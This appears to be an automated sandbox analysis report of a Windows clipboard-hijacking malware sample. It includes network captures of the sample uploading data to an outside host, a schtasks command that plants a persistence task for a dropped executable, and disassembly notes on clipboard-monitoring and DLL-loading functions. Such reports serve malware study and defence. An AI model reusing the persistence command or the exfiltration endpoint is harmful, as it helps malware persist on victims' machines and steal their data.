Oct 12, 2024 12:30:16.140580893 CEST	34608	OUT	Data Raw: 01 c1 31 f1 49 4a 71 ee a0 f6 6c 65 45 0a 55 31 43 b7 19 70 fa b8 40 eb 41 41 0c b8 0e 02 e7 a9 be 4d c5 9c a5 2c 1d 15 08 14 09 1c 16 48 1f 82 32 a8 4b 17 11 8b 23 3c 43 c5 d8 44 5b d3 42 bf 54 e8 23 bc 41 70 66 2a f9 b8 b3 dc 6e 29 82 05 17 c3 Data Ascii: 1IJqleEU1Cp@AAM,H2K#<CD[BT#Apf*n)f'3o;Zw^=[s [8rJa]zBrEXm{(uVQ9!M%J/k"SZt[5j^~5S5~\|
Oct 12, 2024 12:30:16.188477993 CEST	1236	OUT	Data Raw: 14 8a 85 f0 67 e7 ce 6e 19 92 6a 70 b4 2d d0 71 de 7d cb 80 12 b5 25 d7 24 f6 ba 60 d7 b1 c5 61 ae 76 10 af fa 26 a5 c3 37 3a fb 3a 85 b3 e7 93 93 ea 28 af ad be 12 33 bb f5 14 65 54 93 4d 18 7b f3 fc 0b 04 09 b2 7e fe 3d 1d 84 7e cc 2a 69 67 bc Data Ascii: gnjp-q}%$`av&7::(3eTM{~=~igh5rgq6~H\`}s(]fE"^F#;WeX /<7_>fc>E7t:W'tVdu6>+S
Oct 12, 2024 12:30:16.236463070 CEST	1236	OUT	Data Raw: c0 36 0e c3 59 70 f8 ca 43 1b 45 10 17 b5 3f 8c 5c 16 9e 24 86 6d 79 a9 f1 9d dd f3 8e 21 7e 3b aa f6 4f 97 35 65 df 53 86 5e c5 52 6f 07 96 a4 e3 40 c8 bc 21 37 70 56 04 2f 56 90 e1 18 1a 98 10 bb bc 55 b5 aa 60 49 a8 aa bb 4f 63 cd b2 da 9c f8 Data Ascii: 6YpCE?\$my!~;O5eS^Ro@!7pV/VU`IOc(7,Z+snLVe0oQh@4QJC"Jz`U1FF:J\cWJ+l aBx~eaik:xIbap01";XZ~uSI/]o
Oct 12, 2024 12:30:16.284528971 CEST	1236	OUT	Data Raw: 03 8c da 38 e9 b8 67 c9 1c 1d 5e 9d b2 7a 22 51 5f a2 af fb ff ed 6a 28 fe 0f cc ea c8 7d 11 15 ce f2 4b f8 28 0a 24 c7 b3 21 f9 ea 2c 52 d8 bc 43 96 89 e7 e5 a3 9e 5e 8e 9f ea 9e 9f 12 e8 ae 92 ef 0b 7e 30 33 22 cd f0 97 6b 7e 7f f4 54 3f c1 bf Data Ascii: 8g^z"Q_j(}K($!,RC^~03"k~T?OijLLEI&^VJ:YP%x{e:ee[JD{1f9WzQ~(D(O<aCmglBUyf"IYFR)*kO;"(`{oFS
Oct 12, 2024 12:30:16.332446098 CEST	2045	OUT	Data Raw: 05 44 a9 8d 29 28 19 2d 5c 28 3d 78 69 d6 2e 89 47 c5 84 16 91 53 3b 50 3d f0 fa 60 dc 3b 35 c0 42 83 c9 a2 b8 d2 c3 04 06 bf 90 c1 67 77 ed 59 b2 19 e5 76 44 b3 bc 36 66 b0 82 55 5e cd 27 34 62 10 2d a2 1f e8 5a 28 7f 7b fa 6f e8 c9 13 e8 4d e5 Data Ascii: D)(-\(=xi.GS;P=`;5BgwYvD6fU^'4b-Z({oM~o4C@b7u]Z0Sv6x,RhTJoTwoDeI;q+/Pc'I y"$2u#y~134:d%)@[^m!H(E=\|S<M-5<
Oct 12, 2024 12:30:17.035027981 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 12 Oct 2024 10:30:16 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49718	80.66.81.78	80	5648	C:\Users\user\Desktop\lkOawAWJRO.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 12:30:20.193109989 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary57094190 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 30023 Host: sevtvr17pt.top
Oct 12, 2024 12:30:20.193164110 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 35 37 30 39 34 31 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 65 74 Data Ascii: ------Boundary57094190Content-Disposition: form-data; name="file"; filename="Xetefav.bin"Content-Type: application/octet-stream'BZ'O'Ngky&HH7z]Og ;d7)<<X:>QKi_5-/:~nL
Oct 12, 2024 12:30:20.198054075 CEST	1236	OUT	Data Raw: 13 8b f7 16 15 a7 81 7a 08 fe b5 43 63 43 f9 88 51 c4 90 e7 49 c7 a2 bb 3c 0d b7 ac ab f2 88 5b 7c 2e e1 6f 8b ce 67 46 0e e3 bf 92 49 b1 85 a1 91 6e 03 41 0e 70 be 34 df 23 28 20 88 0e 18 6a 9b 25 f8 41 98 9a b9 fd fe 93 7c 63 c1 33 c6 02 bc 2e Data Ascii: zCcCQI<[\|.ogFInAp4#( j%A\|c3.=-x`&~6fw1fL3}71icNm&\-=I[,[XU>RmhLW<(5BngHTZ8hDM&Rc\|!ar
Oct 12, 2024 12:30:20.198054075 CEST	2472	OUT	Data Raw: be 54 26 54 b7 1d b4 9f 2b d2 7a 19 1d e3 bc 90 a5 dc 96 cb c6 f1 2e ed e3 c3 61 33 2d e2 15 1e e8 ca 61 a6 0a ac e5 26 95 4f 20 ce 27 2b ea 18 ec 04 ff cc 48 6a 93 5d 2c 15 9c 23 2f 7a 0f 90 3a d8 f8 f6 8c 74 7c 03 58 fb a7 ed f8 75 10 af c4 df Data Ascii: T&T+z.a3-a&O '+Hj],#/z:t\|XufIHwMN6;pqPk.@0>ihv{lf&vLzP)1nTT,HuArT8q)lrPL~Ad`zq67g>6#p`4
Oct 12, 2024 12:30:20.198111057 CEST	7416	OUT	Data Raw: 84 ed 1e e8 3b c3 e2 3c 9f 05 7c 9c f2 65 25 e0 fc 55 01 31 e1 ab 35 ce f7 0f a6 21 4c 40 95 a7 85 8d 88 99 d0 fc a7 35 c3 8e ca 77 b0 15 0e d2 7f 35 26 dd 46 2e a8 5c 00 0e ae ac d8 54 13 f2 6f 9d a9 16 d6 13 22 be 20 42 86 6b 85 c6 8d f4 5a 62 Data Ascii: ;<\|e%U15!L@5w5&F.\To" BkZbl!8Ho,N-r@_%-p~oH{[q~/AT~%YU`N(G'RC^,8G!v*Fk(x->xAUs\A4`VRc
Oct 12, 2024 12:30:20.198417902 CEST	4944	OUT	Data Raw: 0c 09 c0 1e d7 67 1f ec 44 02 96 41 98 b2 b7 d0 7c 57 bf f3 40 ce 7d ac b4 2c 25 1f 5f cf 52 bf 1e f1 80 20 d2 8f 90 0d b4 89 90 6c c9 6d 69 9c 25 bc 40 00 6f db 12 f9 93 00 73 8a d4 af 6d 2a e6 89 b4 b2 41 8f c1 18 22 2a 46 b2 89 98 91 9b bf b7 Data Ascii: gDA\|W@},%_R lmi%@osmA"Fd]eEv"/ru>udaso3=#trjo"6Y{M#3Pn H!QM&FT\L`>$nW2xUiH nX%#F5J\
Oct 12, 2024 12:30:20.198453903 CEST	2831	OUT	Data Raw: 65 6d fb aa 1a 2c 45 9f 77 96 86 8e e4 bf ea 4b 48 9f 86 7c 1f 74 af 52 8d 6b 60 35 c3 a4 a7 8f 0e a7 d9 70 7d 41 4b a1 bc 6d 33 0c 4c bf c5 63 52 a5 81 0a 0c d5 8f c2 d4 01 5b 1b c9 4f 9e 3a f6 d6 5b 5e 8d 5b 52 af 2a 1a 7c 36 a0 fd 64 5f 54 6f Data Ascii: em,EwKH\|tRk`5p}AKm3LcR[O:[^[R*\|6d_ToUPfM$9~g:$2^c1!t\|ks!twyMFIo^)Zk&GV6&f,)FSkfzd{2X=\bAJm3gg.whzF
Oct 12, 2024 12:30:21.029442072 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 12 Oct 2024 10:30:20 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	06:30:01
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\lkOawAWJRO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lkOawAWJRO.exe"
Imagebase:	0x140000
File size:	6'840'320 bytes
MD5 hash:	1B05EBBFCEC15B251B93721338E525C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.2632067693.0000000004106000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:31:02
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x6c0000
File size:	314'617'856 bytes
MD5 hash:	751D09B372396BF3012988CD55D9E27E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	06:31:02
Start date:	12/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0xeb0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:31:02
Start date:	12/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:31:05
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x6c0000
File size:	314'617'856 bytes
MD5 hash:	751D09B372396BF3012988CD55D9E27E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:32:03
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x6c0000
File size:	314'617'856 bytes
MD5 hash:	751D09B372396BF3012988CD55D9E27E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	46.5%
Total number of Nodes:	99
Total number of Limit Nodes:	3

Executed Functions

Function 6C2114B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C2114CD
_exit.MSVCRT ref: 6C21151A
_write.MSVCRT ref: 6C21156A
_close.MSVCRT ref: 6C211579

Strings

,p3l, xrefs: 6C2E4AED
terminated, xrefs: 6C211540
@, xrefs: 6C2E4AB1
CONOUT$, xrefs: 6C2114C6

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$,p3l$@$CONOUT$
API String ID: 28676597-238887683
Opcode ID: 8c3604d7a6fa4bbf18df7cf0ed4bd6626871a10355b639297df2f57cf3f0e51b
Instruction ID: d0a49ccd597468c5ce608f46b5a5a665591128b22b719f6f83561a78cd7049f4
Opcode Fuzzy Hash: 8c3604d7a6fa4bbf18df7cf0ed4bd6626871a10355b639297df2f57cf3f0e51b
Instruction Fuzzy Hash: E74149B0908309DFDB00EFB9C44465ABBF4AB49318F408A2DECA9E7B50E739C444CB56

Function 006C116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 006C11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 006C1238
__p__acmdln.MSVCRT ref: 006C1261
malloc.MSVCRT ref: 006C12EB
strlen.MSVCRT ref: 006C1323
malloc.MSVCRT ref: 006C132E
memcpy.MSVCRT ref: 006C1344
GetStartupInfoA.KERNEL32 ref: 006C1433

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: e95cbbb8a8484036ead56fbeb99f4074a43dd67ac0e0f0c7e28b459cbd21291d
Instruction ID: b569de7242aa1ae2f099ce9c0301b0a141afb77c3f8561c32b3dd3ebc373ce14
Opcode Fuzzy Hash: e95cbbb8a8484036ead56fbeb99f4074a43dd67ac0e0f0c7e28b459cbd21291d
Instruction Fuzzy Hash: 6E815CB1A042448FDB20EF68D884FB9BBE3FB46304F04452DD9859B312D779D946CB92

Function 006C15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 006C15CD
_exit.MSVCRT ref: 006C161A
_write.MSVCRT ref: 006C166A
_close.MSVCRT ref: 006C1679

Strings

terminated, xrefs: 006C1640
CONOUT$, xrefs: 006C15C6
@, xrefs: 006C8341

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 79bc51e1fd2907b1d2daaf86122b6959ad8447affbe98f9a6626eaa4cf00a20d
Instruction ID: b77a0c7006412bfe0b46260a70446573df6d3973300d554a0e4c750b7045d3ca
Opcode Fuzzy Hash: 79bc51e1fd2907b1d2daaf86122b6959ad8447affbe98f9a6626eaa4cf00a20d
Instruction Fuzzy Hash: C34134B09082058FDB10AFB9C844BBABBE6EB85304F04892DE899D7351E739D8458B56

Function 6C229C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C229EB0: GetClipboardSequenceNumber.USER32 ref: 6C229EBE

Sleep.KERNELBASE ref: 6C229BFF
GetClipboardSequenceNumber.USER32 ref: 6C229C08

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: ClipboardNumberSequence$Sleep
String ID:
API String ID: 2948009381-0
Opcode ID: e1f24633eecac733dec05cb8cfc7de27ef88d98e97462c964f9a78a341d24ca8
Instruction ID: 874916e785fa2b97659fa964d44bf9dedfcc800d5c98e6890d1e37404099a1cd
Opcode Fuzzy Hash: e1f24633eecac733dec05cb8cfc7de27ef88d98e97462c964f9a78a341d24ca8
Instruction Fuzzy Hash: C441D1B051830A8EDB00FF74D1885AEBBF4AF45349F404929EC8697644EB38D51ECB92

Function 006C81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,006C138E,?,?,00006EA2,006C138E), ref: 006C8271
GetProcAddress.KERNEL32 ref: 006C828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,006C138E,?,?,00006EA2,006C138E), ref: 006C829D

Strings

TABWXSQnHhRNhfSFXgWg, xrefs: 006C827E
FuLvJKHyBveQGVRTveQGVRTqGwm.dll, xrefs: 006C824A
Failed to get function address. Error code: %d, xrefs: 006C82E0

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$FuLvJKHyBveQGVRTveQGVRTqGwm.dll$TABWXSQnHhRNhfSFXgWg
API String ID: 145871493-2996062898
Opcode ID: 2ecb4fd34abe6bfdffd380eca821f9923f94d51d24f35de5f3da0d79729d97ec
Instruction ID: 1ba24fe9453275c3248b99d94f38c9fadd72c603201cdc5a6e6f0d824b29b57e
Opcode Fuzzy Hash: 2ecb4fd34abe6bfdffd380eca821f9923f94d51d24f35de5f3da0d79729d97ec
Instruction Fuzzy Hash: 4E31C272A086009FD710AFB8DD49EBEBBF6FB95344F00592CE48583200EB3AD505CB96

Function 006C8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,006C138E,?,?,00006EA2,006C138E), ref: 006C8271
GetProcAddress.KERNEL32 ref: 006C828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,006C138E,?,?,00006EA2,006C138E), ref: 006C829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,006C138E,?,?,00006EA2,006C138E), ref: 006C82BD
GetLastError.KERNEL32 ref: 006C82DA
FreeLibrary.KERNEL32 ref: 006C82F3

Strings

TABWXSQnHhRNhfSFXgWg, xrefs: 006C827E
Failed to load DLL. Error code: %d, xrefs: 006C82C3
FuLvJKHyBveQGVRTveQGVRTqGwm.dll, xrefs: 006C824A

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$FuLvJKHyBveQGVRTveQGVRTqGwm.dll$TABWXSQnHhRNhfSFXgWg
API String ID: 1397630947-3289345901
Opcode ID: ae35e1d2db402b3f9562d367e0453c209a2f82f600bc184a952d2d17bdd37e05
Instruction ID: 888ee0a0443ba6efb91fa0a8ad417c059932291eefc17eb42d632e6662de6b96
Opcode Fuzzy Hash: ae35e1d2db402b3f9562d367e0453c209a2f82f600bc184a952d2d17bdd37e05
Instruction Fuzzy Hash: E311BF72904A049FD710AFB8DD49EBE7FB3EB45348F008A2CD85687251EE36D615CA92

Function 006C13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 006C1238
__p__acmdln.MSVCRT ref: 006C1261
malloc.MSVCRT ref: 006C12EB
strlen.MSVCRT ref: 006C1323
malloc.MSVCRT ref: 006C132E
memcpy.MSVCRT ref: 006C1344
_amsg_exit.MSVCRT ref: 006C13EA
_initterm.MSVCRT ref: 006C140C

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: 73c1355d0b430331b2df3f135f8e18380b40bae05d2656c86b366be0607bba34
Instruction ID: ff3add05e5df503576d01d50e2e15ba0e0f624c7bc65e7ce72212539eae51961
Opcode Fuzzy Hash: 73c1355d0b430331b2df3f135f8e18380b40bae05d2656c86b366be0607bba34
Instruction Fuzzy Hash: 9F4116B4A043418FDB50EF68D894BB9BBE2FB46304F10852DD9859B312DB749946CF86

Function 006C11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 006C11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 006C1238
__p__acmdln.MSVCRT ref: 006C1261
malloc.MSVCRT ref: 006C12EB
strlen.MSVCRT ref: 006C1323
malloc.MSVCRT ref: 006C132E
memcpy.MSVCRT ref: 006C1344
_amsg_exit.MSVCRT ref: 006C13EA
_initterm.MSVCRT ref: 006C140C

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: aba6a3ed17cad47799227ac26fef88e1b1b9356ff9e14fabc675d1e36c072495
Instruction ID: e719d8efa922d0be21a0f7924f8f00fd01172cc80d56e8ead4f0bd8e767194fd
Opcode Fuzzy Hash: aba6a3ed17cad47799227ac26fef88e1b1b9356ff9e14fabc675d1e36c072495
Instruction Fuzzy Hash: FF4118B0A043418FDB50EF68E884B7DBBE2FB46344F14952DD8899B312DB74D946CB91

Function 006C1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 006C11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 006C1238
__p__acmdln.MSVCRT ref: 006C1261
malloc.MSVCRT ref: 006C12EB
strlen.MSVCRT ref: 006C1323
malloc.MSVCRT ref: 006C132E
memcpy.MSVCRT ref: 006C1344
GetStartupInfoA.KERNEL32 ref: 006C1433

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 6d9966c547615865c23a016dc6f480a506cbdda8ca61932170c1d99e0332a063
Instruction ID: ddd3a59e74365a197fa5422891da61ba7fa9e37c5d066fc84102b3c1287823fa
Opcode Fuzzy Hash: 6d9966c547615865c23a016dc6f480a506cbdda8ca61932170c1d99e0332a063
Instruction Fuzzy Hash: 595126B1A042008FDB14DF68E884FBABBF2FB4A304F14952DD9499B312D734E946CB91

Function 6C229B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C229B99
CreateMutexA.KERNELBASE ref: 6C229BE3
Sleep.KERNELBASE ref: 6C229BFF
GetClipboardSequenceNumber.USER32 ref: 6C229C08

Strings

wRMVnNmaPquezxYczDTZ, xrefs: 6C229B82, 6C229BCC

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: wRMVnNmaPquezxYczDTZ
API String ID: 3689039344-1302263954
Opcode ID: d04f2c394cf1b77195c6e266fa354bd0412173ca78a515ea232fba94b154dbc2
Instruction ID: 729b0314c94e407198f6390ece7368c2a240ca101389648b9603d8a9a7cd91e1
